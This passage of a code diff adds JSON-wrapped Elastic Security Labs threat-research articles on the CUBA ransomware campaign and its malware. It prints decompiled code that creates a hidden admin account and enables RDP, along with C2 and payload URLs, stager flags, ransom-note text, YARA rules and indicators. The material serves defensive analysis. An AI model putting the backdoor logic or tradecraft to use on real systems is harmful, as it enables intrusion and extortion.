alert that fired upon the creation and execution of add2.exe by the IIS worker process handling the Exchange service. This was the same technique observed previously with the afk.ttf attempt. 
Interestingly, these executions happened within about 15 minutes of each other on victims in different countries and different industry verticals.\n\n\n\nThe Elastic Malware Analysis and Reverse Engineering (MARE) team was able to [find this file in VirusTotal](https://www.virustotal.com/gui/file/728994be6b928de3d1c7b49ca1c79db8656c1cf4b95a1e508a6be48c6ab407da/detection) and pull it down for binary analysis.\n\n```\nBOOL sub_4013B0()\n{\n int v1;\n int v2;\n WCHAR REMOTE_DESKTOP_USERS_groups_list[256];\n WCHAR ADMINS_groups_list[256];\n char password[44];\n wchar_t username[9];\n v2 = enum_local_groups(DOMAIN_ALIAS_RID_ADMINS, ADMINS_groups_list);\n v1 = enum_local_groups(DOMAIN_ALIAS_RID_REMOTE_DESKTOP_USERS, REMOTE_DESKTOP_USERS_groups_list);\n if ( v2 || v1 )\n {\n wcscpy(username, L\"Mysql\");\n qmemcpy(password, L\"KJaoifhLOaiwdhadx1@!\", 0x2Au);\n if ( Add_user((int)username, (int)password) )\n {\n if ( v2 )\n add_user_groups(ADMINS_groups_list, (int)username);\n if ( v1 )\n add_user_groups(REMOTE_DESKTOP_USERS_groups_list, (int)username);\n hide_accountName(username); // SpecialAccounts\\\\UserList regkey\n }\n }\n return enable_RDP();\n}\n```\n\nMARE determined that this executable performs several functions:\n\nEnumerates local administrator and RDP groups.\n\n```\n WCHAR REMOTE_DESKTOP_USERS_groups_list[256];\n WCHAR ADMINS_groups_list[256];\n char password[44];\n wchar_t username[9];\n v2 = enum_local_groups(DOMAIN_ALIAS_RID_ADMINS, ADMINS_groups_list);\n v1 = enum_local_groups(DOMAIN_ALIAS_RID_REMOTE_DESKTOP_USERS, REMOTE_DESKTOP_USERS_groups_list);\n if ( v2 || v1 )\n```\n\nCreates a new user Mysql, sets the password to KJaoifhLOaiwdhadx1@!, and sets no expiration date (0x2Au).\n\n```\n wcscpy(username, L\"Mysql\");\n qmemcpy(password, L\"KJaoifhLOaiwdhadx1@!\", 0x2Au);\n if ( Add_user((int)username, (int)password) )\n```\n\nAdds this user to the previously enumerated local administrative and RDP groups.\n\n```\n if ( v2 )\n add_user_groups(ADMINS_groups_list, (int)username);\n if ( v1 )\n add_user_groups(REMOTE_DESKTOP_USERS_groups_list, (int)username);\n```\n\nSets the SpecialAccounts\\UserList regkey for this user to hide the user from login screens and the control panel.\n\n```\n hide_accountName(username); // SpecialAccounts\\UserList regkey\n```\n\nEnables RDP by setting the `fDenyTSConnections` value to false in the Registry.\n\n```\nreturn enable_RDP();\n```\n\nIn total, add2.exe establishes local persistence via a hidden user and the opening of a remote access service. This enables the REF9019 actor to connect back to this machine in case of discovery, patching of the vulnerability, or an incomplete eviction.\n\nAdditionally, VirusTotal indicated on the [graph page](https://www.virustotal.com/graph/728994be6b928de3d1c7b49ca1c79db8656c1cf4b95a1e508a6be48c6ab407da) that this file has been hosted at `http://208.76.253[.]84`.\n\nOf particular note, within the strings of add2.exe, we identified a unique program database file (PDB) named AddUser.pdb. PDB files are used to map elements of source code to the compiled program.\n\n\n\nSearching in VirusTotal for the HEX value of F:\\Source\\WorkNew17\\ (content:\\{463a5c536f757263655c576f726b4e65773137\\}), we identified another file named ad.exe which shared the same folder structure, and included another PDB file, CmdDLL.pdb.\n\n\n\nVirusTotal shows on the [graph page](https://www.virustotal.com/graph/http%253A%252F%252F108.170.31.115%252Fadd.dll) that this file has been hosted at `http://108.170.31[.]115/add.dll`. 
While we did not observe add.dll, we believe the two files are related and have included the name, hash, and IP in our Observables table, as the IP address (108.170.31[.]115) was also [reported](https://www.virustotal.com/gui/ip-address/108.170.31.115/relations) distributing ra.exe (see the NetSupport section below).\n\nUsing these same search criteria, we were able to locate [three](https://any.run/report/bd270853db17f94c2b8e4bd9fa089756a147ed45cbc44d6c2b0c78f361978906/e1579345-7571-4dcb-af4c-e74a4a81d804) [other](https://any.run/report/2213db3f856cbed85a52cfa0275fa6eaba8e852a7e78449ab469d85d1945dc80/ed6077c3-6e2a-4f74-a761-cc0a354cc159) [files](https://www.joesandbox.com/analysis/417560/1/html) with the same PDB debugging artifacts.\n\n## Remote Access Tools\n\nAfter establishing a beachhead, REF9019 dropped tooling to manage the post-exploitation phase of the attacks. Notably, not all tools were present in each attack. 
It’s unclear if the decision to use one tool over another was merely driven by preference of individual operators, or if there was an operational factor that contributed to the decision.\n\n### SystemBC\n\n[SystemBC](https://malpedia.caad.fkie.fraunhofer.de/details/win.systembc) is a socks5 backdoor with the ability to communicate over TOR.\n\nIt was identified via malware_signature alerts that ran after SystemBC was injected into a svchost.exe process.\n\n\n\nPost processing of the compressed_bytes of the shellcode_thread alert exposed network indicators our sample utilized, including its command and control server (104.217.8[.]100:5050).\n\n> Check out AhnLab’s ASEC blog for [detailed coverage of SystemBC’s features](https://asec.ahnlab.com/en/33600/).\n\nLet’s look at the data for the SystemBC binary that was collected from the process.Ext.memory_region.bytes_compressed field.\n\n\n\nIf we run this through the strings command, it becomes a bit more readable. As mentioned above, the work done by the team at ASEC does a tremendous job of describing the SystemBC remote access tool, so we’ll focus on the atomic indicators that we observed.\n\n```\n…truncated…\nBEGINDATA\nHOST1:104.217.8[.]100\nHOST2:104.217.8[.]100\nPORT1:5050\n…truncated…\n193.23.244[.]244\n86.59.21[.]38\n199.58.81[.]140\n204.13.164[.]118\n194.109.206[.]212\n131.188.40[.]189\n154.35.175[.]225\n171.25.193[.]9\n128.31.0[.]34\n128.31.0[.]39\n/tor/status-vote/current/consensus\n/tor/server/fp/\n…truncated…\n```\n\nThe values of HOST1 and HOST2 are [well-documented](https://bazaar.abuse.ch/sample/6b36e8569a8b6150d760c3cfa1f23ff6072d2ab3bedd3633dc269ea6fd5fff9e/)[ infrastructure](https://otx.alienvault.com/indicator/file/b9446c5f3fb7dd19e9f495d88431df2f0899ecb2) for the SystemBC tool. The list of 10 IP addresses is Tor [directory authorities](https://metrics.torproject.org/glossary.html#directory-authority). 
One IP address is selected from the list to get the [consensus data](https://metrics.torproject.org/glossary.html#consensus) for the Tor network. Then it will start Tor communications based on the settings it received (as previously reported by ASEC).\n\nWhile we were not able to confirm whether Tor traffic occurred, this could have been a clandestine way to exfiltrate sensitive data.\n\n### GoToAssist\n\n[GoToAssist](https://en.wikipedia.org/wiki/RescueAssist) is a remote desktop support application with some legitimate usage, but it is also known for its use in tech support scams. In this incident, it was used to download a malicious DLL to the newly created user’s downloads directory (C:\\Users\\Mysql\\Downloads\\94-79.dll). We were unable to collect this file and have not observed it later in the incident; however, previous reporting has indicated that DLLs with similar naming conventions have been used in CUBA campaigns.\n\n\n\n### NetSupport\n\nNetSupport Manager is another client-server remote desktop management application. In this incident, NetSupport was named ra.exe and was written and executed from the C:\\programdata\\ directory by the previously exploited IIS worker process (w3wp.exe). 
ra.exe has been distributed by a previously identified IP address (see the add2.exe section above).\n\n\n\nOur sample is the [NetSupportManager RAT](https://malpedia.caad.fkie.fraunhofer.de/details/win.netsupportmanager_rat) as indicated on [VirusTotal](https://www.virustotal.com/gui/file/5669f6a48dac80717fa5770fa3be6c18022a7633b996ccf0df6b468994085378), which corroborates [prior reporting](https://www.mandiant.com/resources/unc2596-cuba-ransomware) of its usage by the CUBA Ransomware group.\n\n### Cobalt Strike\n\nCobalt Strike was used in these intrusions; we confirmed this by reviewing the value of the [Target.process.thread.Ext.start_address_bytes](https://docs.elastic.co/en/integrations/endpoint) (a few (typically 32) raw opcode bytes at the thread start address, hex-encoded). Upon doing this, we observed bytes commonly seen in Cobalt Strike payloads.\n\nWhen analyzing the process data that we extracted from memory, we can see that dhl.jpg (from mvnetworking[.]com) and temp.png (from bluetechsupply[.]com) are being used for command and control. This is corroborated by [previous ](https://twitter.com/drb_ra/status/1482117406122201095)[research](https://www.darktrace.com/en/inside-the-soc/how-antigena-intercepted-and-delayed-a-cobalt-strike-intrusion/).\n\n\n\n\n\nLooking at the domains in Shodan ([[1](https://www.shodan.io/search?query=mvnetworking.com)][[2](https://www.shodan.io/search?query=bluetechsupply.com)]), we can see that they are both categorized as Cobalt Strike beacon C2 infrastructure.\n\n\n\n\n\nBoth sites are hosted by a cloud provider, Hivelocity, Inc. We have requested the domains be taken down.\n\n### BUGHATCH\n\nBUGHATCH is the name given to a CUBA Ransomware-associated downloader by Mandiant in their blog on [UNC2596](https://www.mandiant.com/resources/unc2596-cuba-ransomware). 
We detail the observed execution chain and indicators below.\n\nBUGHATCH was launched via PowerShell script stagers in both cases. One execution followed the dropping of a malicious DLL to the Mysql user’s downloads folder (C:\\Users\\Mysql\\Downloads\\14931s.dll). The download URI for the next stage was found in the Target.process.Ext.memory_region.strings (`http://64.235.39[.]82/Agent32.bin`).\n\n\n\nIn the above example, we observed agsyst82.ps1 downloading Agent32.bin from 64.235.39[.]82, but were unable to collect the PowerShell script. However, while performing open-source research, we identified a PowerShell script on ANY.RUN that performed network connections to the same IP and URL (`http://64.235.39[.]82/Agent32.bin`). The script is named komar.ps1 in ANY.RUN’s analysis. We are associating these two PowerShell scripts and the network activity together.\n\n\n\nThe other PowerShell script was called by a malicious file, cps.exe. This PowerShell script is called komar2.ps1 and downloads Agent32.bin from 38.108.119[.]121.\n\n\n\nkomar2.ps1 next attempts to inject itself into svchost.exe from C:\\Windows\\Sysnative\\svchost.exe.\n\n\n\n> For context, the C:\\Windows\\Sysnative path is a legitimate Windows directory used to allow 32-bit applications to access the System32 folder on a 64-bit version of Windows. This path has also been observed as a [SpawnTo parameter](https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/) in Cobalt Strike process injection configurations.\n\nThis new injected process again executes komar2.ps1 and includes a new PDB entry of F:\\Source\\Mosquito\\Agent\\x64\\Release\\Agent.pdb. “Komar” means “mosquito” in Polish and is a good indicator for identifying other related entities; we see “Mosquito” in the path of the PDB. 
While a weak association by itself, the PDB in this sample is located in F:\\Source\\, which is the same location that we’d observed with F:\\Source\\WorkNew## above for add2.exe. By themselves, they are not a solid reference point between the two samples, but when compared together, they can be categorized as “interesting”.\n\nBased on analysis of the Agent32.bin file, we believe that this is the BUGHATCH malware. BUGHATCH has been observed being used as a downloader in CUBA ransomware incidents, which aligns with how we observed Agent32.bin. BUGHATCH has been [covered in the UNC2596 blog](https://www.mandiant.com/resources/unc2596-cuba-ransomware) by the team at Mandiant.\n\n## Credential Harvesting, Internal Reconnaissance, and Lateral Movement\n\nCredential harvesting was observed through process injection into the GoToAssistUnattendedUi.exe binaries. These appear to be the legitimate files for the Go To Assist suite. The credential harvesting was accomplished using Meterpreter and Mimikatz.\n\n### Meterpreter\n\nAs we observed in the initial infection several months prior, Meterpreter was used to collect the SAM database using the [hashdump module](https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/#:~:text=SYSTEM%0Ameterpreter%20%3E-,hashdump,-The%20hashdump%20post). As before, this was observed in the Target.process.Ext.memory_region.strings fields.\n\n\n\n### Mimikatz\n\nAs with the Meterpreter tool markings, we also observed [Mimikatz](https://attack.mitre.org/software/S0002/). Mimikatz is an offensive security tool used to collect and inject passwords from compromised systems. 
It uses the [SEKURLSA::LogonPasswords](https://adsecurity.org/?page_id=1821#SEKURLSALogonPasswords) module to list all available provider credentials, and this was observed in the Target.process.Ext.memory_region.strings fields.\n\n\n\n### Zerologon Exploit\n\nNext the threat actors attempted to use a file called zero.exe, which is used to exploit the [Zerologon vulnerability](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-1472) to escalate privileges. This file is referenced in [previous reporting](https://thedfirreport.com/2021/11/01/from-zero-to-domain-admin/) and is executed on a vulnerable domain controller to dump the NTLM hash for the Administrator. This is a common tactic for lateral movement and to deploy additional implants into the environment, such as Cobalt Strike.\n\n### PsExec\n\n[PsExec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec) is a legitimate utility, part of the SysInternals suite of tools, used to interactively launch processes on remote systems. PsExec is a common tool for remote administration, both benign and malicious.\n\nWhile we cannot validate how specifically PsExec was used because there was not an SMB parser on the infected hosts, we can see that PsExec was used to move files between the infected hosts. We cannot confirm that this was not normal administration by the local IT staff, but the only activity observed was between infected hosts and was within the time window of other confirmed malicious activity.\n\n\n\n### Using LOLBAS\n\n[Living off the land binaries, scripts, and libraries (LOLBAS)](https://lolbas-project.github.io/#) is a commonly leveraged method to use native and benign tools for malicious purposes. 
This reduces the number of attacker tools that need to be moved into the environment and makes the activity appear more like legitimate processes running in a targeted environment.\n\nIn one intrusion we observed PsExec being used to remotely copy files (see the PsExec section); however, in another environment, we observed similar activity using cmd.exe to move files from one host to another. We were unable to collect the files that were being moved for analysis, but they were a DLL and a Batch file named d478.dll and d478.bat, and the atomic indicators are stored in the Observations table.\n\n\n\n## Data Exfiltration\n\nThe CUBA group belongs to a class of ransomware operators that uses extortion as a mechanism to coerce payments from their victims.\n\nIn these situations, once initial access and a foothold are achieved, threat actors will identify potentially sensitive data and exfiltrate it from the environment to use for threats of “name and shame”.\n\nThe CUBA group runs a website on the dark web where they release data from victims that do not pay. 
CUBA releases some data for free, while data deemed more lucrative is offered for a payment.\n\n\n\n\n\n\n\nThere are multiple ways that the victim data could have been exfiltrated for extortion; BUGHATCH, Meterpreter, and Cobalt Strike all have data movement capabilities.\n\n## Defense Evasion and Actions on the Objective\n\n### DefenderControl.exe\n\nTo prevent the detection of their malware, the threat actors used [Defender Control](https://www.sordum.org/9480/defender-control-v2-1/) as a way to disable Microsoft Defender, the native antivirus built into all Windows systems since Vista.\n\nTo ensure that Defender Control continued to run, the threat actor used svchost.exe to create a scheduled task.\n\n\n\n### CUBA Ransomware\n\nWe detail the observed execution chain and indicators above, but please see Elastic MARE’s detailed reverse engineering of this sample [here](https://www.elastic.co/security-labs/cuba-ransomware-malware-analysis).\n\n\n\n## Diamond Model\n\nElastic Security utilizes the [Diamond Model](https://www.activeresponse.org/wp-content/uploads/2013/07/diamond.pdf) to describe high-level relationships between the adversaries, capabilities, infrastructure, and victims of intrusions. While the Diamond Model is most commonly used with single intrusions, and leveraging Activity Threading (section 8) as a way to create relationships between incidents, an adversary-centered (section 7.1.4) approach allows for a single, although cluttered, diamond.\n\n\n\n## Observed Adversary Tactics and Techniques\n\n### Tactics\n\nUsing the MITRE ATT&CK® framework, tactics represent the why of a technique or sub technique. 
It is the adversary’s tactical goal: the reason for performing an action.\n\n- Initial access\n- Persistence\n- Privilege escalation\n- Defense evasion\n- Credential access\n- Discovery\n- Lateral movement\n- Command & Control\n- Exfiltration\n- Impact\n\nIt should be noted that we did not observe the Collection tactic, but based on the evidence of Exfiltration and Impact, this would have been completed.\n\n### Techniques / Sub Techniques\n\nTechniques and Sub techniques represent how an adversary achieves a tactical goal by performing an action.\n\nAs noted throughout this research, this covered multiple victims over a large period of time. The CUBA intrusion set has been reported using different techniques and sub techniques, but these are our specific observations.\n\nObserved techniques/sub techniques.\n\n- Exploit Public-Facing Application\n- Command and Scripting Interpreter - PowerShell, Windows Command Shell\n- Scheduled Task/Job - Scheduled Task\n- Boot or Logon Autostart Execution - Registry Run Keys/Startup Folder\n- Create Account - Local Account\n- OS Credential Dumping - LSA Secrets\n- Data Encrypted for Impact\n- Hide Artifact - Hidden Window\n- Masquerading - Match Legitimate Name or Location\n- Obfuscated Files or Information\n- Reflective Code Loading\n\n## Detection\n\n### YARA\n\nElastic Security has created YARA rules to identify this BUGHATCH and CUBA ransomware activity.\n\n```\nrule Windows_Trojan_Bughatch {\n meta:\n author = \"Elastic Security\"\n creation_date = \"2022-05-09\"\n last_modified = \"2022-05-09\"\n os = \"Windows\"\n arch = \"x86\"\n category_type = \"Trojan\"\n family = \"Bughatch\"\n threat_name = \"Windows.Trojan.Bughatch\"\n reference_sample = \"b495456a2239f3ba48e43ef295d6c00066473d6a7991051e1705a48746e8051f\"\n strings:\n $a1 = { 8B 45 ?? 33 D2 B9 A7 00 00 00 F7 F1 85 D2 75 ?? B8 01 00 00 00 EB 33 C0 }\n $a2 = { 8B 45 ?? 0F B7 48 04 81 F9 64 86 00 00 75 3B 8B 55 ?? 0F B7 42 16 25 00 20 00 00 ?? ?? B8 06 00 00 00 EB ?? 
}\n $b1 = { 69 4D 10 FD 43 03 00 81 C1 C3 9E 26 00 89 4D 10 8B 55 FC 8B 45 F8 0F B7 0C 50 8B 55 10 C1 EA 10 81 E2 FF FF 00 00 33 CA 8B 45 FC 8B 55 F8 66 89 0C 42 }\n $c1 = \"-windowstyle hidden -executionpolicy bypass -file\"\n $c2 = \"C:\\\\Windows\\\\SysWOW64\\\\WindowsPowerShell\\\\v1.0\\\\PowerShell.exe\"\n $c3 = \"ReflectiveLoader\"\n $c4 = \"\\\\Sysnative\\\\\"\n $c5 = \"TEMP%u.CMD\"\n $c6 = \"TEMP%u.PS1\"\n $c7 = \"\\\\TEMP%d.%s\"\n $c8 = \"NtSetContextThread\"\n $c9 = \"NtResumeThread\"\n condition:\n ($a1 or $a2 or $b1) or 6 of ($c*)\n}\n\nrule Windows_Ransomware_Cuba {\n meta:\n os = \"Windows\"\n arch = \"x86\"\n category_type = \"Ransomware\"\n family = \"Cuba\"\n threat_name = \"Windows.Ransomware.Cuba\"\n reference_sample = \"33352a38454cfc247bc7465bf177f5f97d7fd0bd220103d4422c8ec45b4d3d0e\"\n\n strings:\n $a1 = { 45 EC 8B F9 8B 45 14 89 45 F0 8D 45 E4 50 8D 45 F8 66 0F 13 }\n $a2 = { 8B 06 81 38 46 49 44 45 75 ?? 81 78 04 4C 2E 43 41 74 }\n $b1 = \"We also inform that your databases, ftp server and file server were downloaded by us to our servers.\" ascii fullword\n $b2 = \"Good day. All your files are encrypted. 
For decryption contact us.\" ascii fullword\n $b3 = \".cuba\" wide fullword\n\n condition:\n any of ($a*) or all of ($b*)\n}\n```\n\n## Defensive Recommendations\n\n- Enable Elastic Security Memory and Ransomware protections\n\n- Review and ensure that you have deployed the latest Microsoft Security Updates\n- Maintain backups of your critical systems to aid in quick recovery\n- Attack surface reduction\n- Network segmentation\n\n## Observations\n\nAtomic indicators observed in our investigation.\n\n|\n| |\n| Indicator | Type | Reference from blog | Note |\n| --- | --- | --- | --- |\n| 43f7d739f00c2fdc67f7ab6b976565a323a181fb6570ac3d261dff197f820165 | SHA-256 | afk.ttf | |\n| 159.203.70[.]39 | ipv4-addr | afk.ttf C2 IP | |\n| 728994be6b928de3d1c7b49ca1c79db8656c1cf4b95a1e508a6be48c6ab407da | SHA-256 | add2.exe | |\n| 208.76.253[.]84 | ipv4-addr | add2.exe C2 IP | |\n| c24d7a93d6a5c33e673e6b0fd171701c4646e67cf2328f41739ef9b50302a02e | SHA-256 | add.dll | |\n| 108.170.31[.]115 | ipv4-addr | add.dll C2 IP | |\n| 62f1fbb6f151bcc67fe68e06031af00bc87ae7e4d9d0a6a60a31d140def09365 | SHA-256 | 94-79.dll | |\n| 5669f6a48dac80717fa5770fa3be6c18022a7633b996ccf0df6b468994085378 | SHA-256 | ra.exe | |\n| 9c71b67411b1432931b4b135dc945f6f7f9da3c295a7449f3ab8dcb56681fa70 | SHA-256 | cps.exe | |\n| e35632770a23d8e006e149b038c2ccf576c2da0998d830bbc7d7614dc5c22db5 | SHA-256 | 14931s.dll | |\n| 38.108.119[.]121 | ipv4-addr | Agent32.bin stage location | |\n| 64.235.39[.]82 | ipv4-addr | Agent32.bin stage location | |\n| 17edf458f7b8baae5ddef725e255d3a7bb6c960830503556f157655308895128 | SHA-256 | Agent32.bin (BUGHATCH) | |\n| 2e6fffad384cd6ce93cc1cde97911063e640c1953dac0507cd5f5b4b3d21bb69 | SHA-256 | Agent32.bin (BUGHATCH) | |\n| 144.172.83[.]13 | ipv4-addr | Agent32.bin C2 IP | |\n| 3a8b7c1fe9bd9451c0a51e4122605efc98e7e4e13ed117139a13e4749e211ed0 | SHA-256 | zero.exe | |\n| cdf2b3fbff2649a119051c63904476e70262bde2f6a9a7da8b7db13cbf257851 | SHA-256 | d478.dll | |\n| 104.217.8[.]100 | 
ipv4-addr | SystemBC infrastructure | |\n| 193.23.244[.]244 | ipv4-addr | SystemBC Tor directory authority | |\n| 86.59.21[.]38 | ipv4-addr | SystemBC Tor directory authority | |\n| 199.58.81[.]140 | ipv4-addr | SystemBC Tor directory authority | |\n| 204.13.164[.]118 | ipv4-addr | SystemBC Tor directory authority | |\n| 194.109.206[.]212 | ipv4-addr | SystemBC Tor directory authority | |\n| 131.188.40[.]189 | ipv4-addr | SystemBC Tor directory authority | |\n| 154.35.175[.]225 | ipv4-addr | SystemBC Tor directory authority | |\n| 171.25.193[.]9 | ipv4-addr | SystemBC Tor directory authority | |\n| 128.31.0[.]34 | ipv4-addr | SystemBC Tor directory authority | |\n| 128.31.0[.]39 | ipv4-addr | SystemBC Tor directory authority | |\n| bluetechsupply[.]com/components/temp.png | url | Cobalt Strike C2 URL | |\n| bluetechsupply[.]com | domain-name | Cobalt Strike C2 | |\n| 217.79.243[.]148 | ipv4-addr | Cobalt Strike C2 | |\n| mvnetworking[.]com | domain-name | Cobalt Strike C2 | |\n| mvnetworking[.]com/files/dhl.jpg | url | Cobalt Strike C2 URL | |\n| 149.255.35[.]131 | ipv4-addr | Cobalt Strike C2 | |\n| ce3a6224dae98fdaa712cfa6495cb72349f333133dbfb339c9e90699cbe4e8e4 | SHA-256 | defender.exe \\ DefenderControl.exe | |\n| 0f385cc69a93abeaf84994e7887cb173e889d309a515b55b2205805bdfe468a3 | SHA-256 | A.exe \\ (CUBA RANSOMWARE) | |\n| b16e0d27e6fa24d3fe7c9ed9167474fbc1cde13ce047878bbd16548cfdf45be3 | SHA-256 | Anet.exe(CUBA RANSOMWARE) | |\n"
+ },
+ "title": "CUBA Ransomware Campaign Analysis",
+ "slug": "cuba-ransomware-campaign-analysis",
+ "date": "2022-09-08",
+ "description": "Elastic Security observed a ransomware and extortion campaign leveraging a combination of offensive security tools, LOLBAS, and exploits to deliver the CUBA ransomware malware.",
+ "author": [
+ {
+ "slug": "daniel-stepanic"
+ },
+ {
+ "slug": "derek-ditch"
+ },
+ {
+ "slug": "seth-goodwin"
+ },
+ {
+ "slug": "salim-bitam"
+ },
+ {
+ "slug": "andrew-pease"
+ }
+ ],
+ "image": "blog-thumb-hard-drives.jpg",
+ "category": [
+ {
+ "slug": "campaigns"
+ }
+ ],
+ "tags": [
+ "ref9019",
+ "cuba",
+ "ransomware"
+ ]
+ },
+ "id": "security_labs_content-cuba_ransomware_campaign_analysis-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-cuba_ransomware_malware_analysis-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-cuba_ransomware_malware_analysis-md.json
new file mode 100644
index 00000000000..d452a049ab5
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-cuba_ransomware_malware_analysis-md.json
@@ -0,0 +1,29 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"CUBA Ransomware Malware Analysis\"\nslug: \"cuba-ransomware-malware-analysis\"\ndate: \"2023-02-14\"\ndescription: \"Elastic Security has performed a deep technical analysis of the CUBA ransomware family. This includes malware capabilities as well as defensive countermeasures.\"\nauthor:\n - slug: salim-bitam\nimage: \"blog-thumb-coin-stacks.jpg\"\ncategory:\n - slug: malware-analysis\ntags:\n - ref9019\n - cuba\n - ransomware\n---\n\n## Summary\n\nAs a part of Elastic Security’s ongoing threat detection and monitoring efforts, we have recently observed a ransomware intrusion by the CUBA ransomware threat group, internally tracked as REF9019. This report will detail the inner workings of the ransomware deployed inside the network to encrypt the victim’s files. Cuba ransomware provides the attacker with the flexibility to encrypt both local and network shares files in the enterprise. CUBA uses the ChaCha20 cipher algorithm for symmetric encryption and RSA encryption to protect the ChaCha20 keys. 
CUBA is multithreaded for faster encryption with resource access synchronization to avoid file corruption.\n\nIn this analysis, we will describe the following:\n\n- Operations mode\n- Process and services termination\n- Enumeration of volumes\n- Threading implementation\n- File encryption and algorithms used\n- MITRE ATT&CK mapping\n- YARA rule\n- Indicators of compromise\n\n### Static Analysis\n\n| | |\n| --------------- | ---------------------------------------------------------------- |\n| SHA256 Packed | 0f385cc69a93abeaf84994e7887cb173e889d309a515b55b2205805bdfe468a3 |\n| SHA256 Unpacked | 3654af86dc682e95c811e4fd87ea405b627bca81c656f3a520a4b24bf2de879f |\n| File Size | 135168 bytes |\n| File Type | Executable |\n| Imphash | CA5F4AF10ABC885182F3FB9ED425DE65 |\n| Compile Time | Wed Mar 09 22:00:31 2022 (UTC) |\n| Entropy | 6.582 |\n\n### Sections\n\n| Name | VirtualAddress | Virtual Size | Raw Size | Entropy | MD5 |\n| ------ | -------------- | ------------ | -------- | ------- | -------------------------------- |\n| .text | 0x00401000 | 0x13B5F | 0x13C00 | 6.608 | 931B22064E9E214BF59A4E07A6CA9109 |\n| .rdata | 0x00415000 | 0xA71C | 0xA800 | 5.855 | F6F97411BCD64126A96B08BA9AE1E775 |\n| .data | 0x00420000 | 0x16B0 | 0xC00 | 3.450 | 03B1B11B4531BB656E43A8B457D4A5F7 |\n| .rsrc | 0x00422000 | 0x1E0 | 0x200 | 4.704 | F754ADBD7F5D6195FD6D527001CAB98C |\n| .reloc | 0x00423000 | 0x1200 | 0x1200 | 6.573 | 08B0994DAECAAAA4173B388A80CC52FE |\n\n> For information on the CUBA ransomware campaign and associated malware analysis, check out our blog posts detailing this:\n>\n> - [CUBA Campaign Analysis](https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis)\n> - [BUGHATCH Malware Analysis](https://www.elastic.co/security-labs/bughatch-malware-analysis)\n\n### 
Imports\n\n```\nGetProcessImageFileNameW\nEnumProcesses\nNetApiBufferFree\nNetShareEnum\nGetIpNetTable\nPathFindFileNameW\nFindFirstFileExW\nFindFirstFileW\nFindNextFileW\nWriteFile\nSetFileAttributesW\nMoveFileExW\nFindFirstVolumeW\nTerminateProcess\nGetEnvironmentStringsW\nOpenProcess\nGetCurrentProcessId\nCreateProcessW\nGetVolumePathNamesForVolumeNameW\nFindNextVolumeW\nGetCurrentThreadId\nRaiseException\nGetModuleHandleExW\nOpenProcessToken\nCryptAcquireContextA\nCryptGenRandom\nCryptReleaseContext\nAdjustTokenPrivileges\nLookupPrivilegeValueA\nControlService\nChangeServiceConfigW\nPathAddBackslashW\nGetCPInfo\nGetOEMCP\nIsValidCodePage\nlstrcpynW\nInterlockedDecrement\nFindClose\nCreateFileW\nSleep\nlstrcatW\nCloseHandle\nCreateThread\nlstrcpyW\nlstrcmpW\nReadFile\nGetFileSizeEx\nEnterCriticalSection\nGetCurrentProcess\nGetModuleFileNameW\nLeaveCriticalSection\nGetCommandLineA\nWaitForSingleObject\nGetLastError\nSetEvent\nGetDiskFreeSpaceExW\nResetEvent\nGetWindowsDirectoryW\nSetFilePointerEx\nExitProcess\nCreateEventA\nlstrcmpiW\nGetTickCount\nDeleteCriticalSection\nQueryPerformanceCounter\nSetStdHandle\nFreeEnvironmentStringsW\nGetCommandLineW\nDecodePointer\nGetStringTypeW\nGetProcessHeap\nFlushFileBuffers\nGetConsoleCP\nHeapSize\nWriteConsoleW\nInitializeCriticalSection\nUnhandledExceptionFilter\nSetUnhandledExceptionFilter\nIsProcessorFeaturePresent\nInitializeCriticalSectionAndSpinCount\nWaitForSingleObjectEx\nCreateEventW\nGetModuleHandleW\nGetProcAddress\nIsDebuggerPresent\nGetStartupInfoW\nGetSystemTimeAsFileTime\nInitializeSListHead\nRtlUnwind\nSetLastError\nEncodePointer\nTlsAlloc\nTlsGetValue\nTlsSetValue\nTlsFree\nFreeLibrary\nLoadLibraryExW\nGetFileType\nGetStdHandle\nMultiByteToWideChar\nWideCharToMultiByte\nGetACP\nHeapFree\nHeapAlloc\nLCMapStringW\nHeapReAlloc\nGetConsoleMode\nCharLowerW\nGetKeyboardLayoutList\nwsprintfW\nCloseServiceHandle\nOpenSCManagerW\nOpenServiceW\nQueryServiceStatusEx\n```\n\n### Strings\n\n```\nGood day. 
All your files are encrypted. For decryption contact us.\nWrite here waterstatus@cock.li\nreserve admin@encryption-support.com\njabber cuba_support@exploit.im\nWe also inform that your databases, ftp server and file server were downloaded by us to our servers.\nIf we do not receive a message from you within three days, we regard this as a refusal to negotiate.\nCheck our platform: http://cuba4ikm4jakjgmkezytyawtdgr2xymvy6nvzgw5cglswg3si76icnqd.onion/\n* Do not rename encrypted files.\n* Do not try to decrypt your data using third party software,\n it may cause permanent data loss.\n* Do not stop process of encryption, because partial encryption cannot be decrypted.\n!! READ ME !!.txt\n```\n\n## Code Analysis\n\n### Entry Point\n\nThe malware starts by retrieving the active input locale identifiers of the victim using the GetKeyboardLayoutList API. When the Russian language is in the list of supported languages of the machine, the process deletes and terminates itself with a simple command line: c:\\system32\\cmd.exe /c del PATH_TO_BINARY without encrypting the file system.\n\n\n\n### Command-line Options\n\nThe threat actor included 4 different operations based on the following command-line arguments:\n\n- The network keyword\n- An IP keyword\n- A path keyword\n- The local keyword\n \n\n**Network keyword parameter**\n\nWhen specifying the network keyword, the malware retrieves the Address Resolution Protocol (ARP) table of the machine using the GetIpNetTable Windows API and enumerates the shares of each IP in the ARP table; this information is added to a linked list that will be accessed by the encryption capability, which is discussed in detail below.\n\n\n\n**IP keyword parameter**\n\nBy specifying an IP address as the first parameter in the command line, the malware proceeds by enumerating and encrypting every share found for the specified IP.\n\n**Path keyword parameter**\n\nThe malware will encrypt the local directory contents, or the file provided, as 
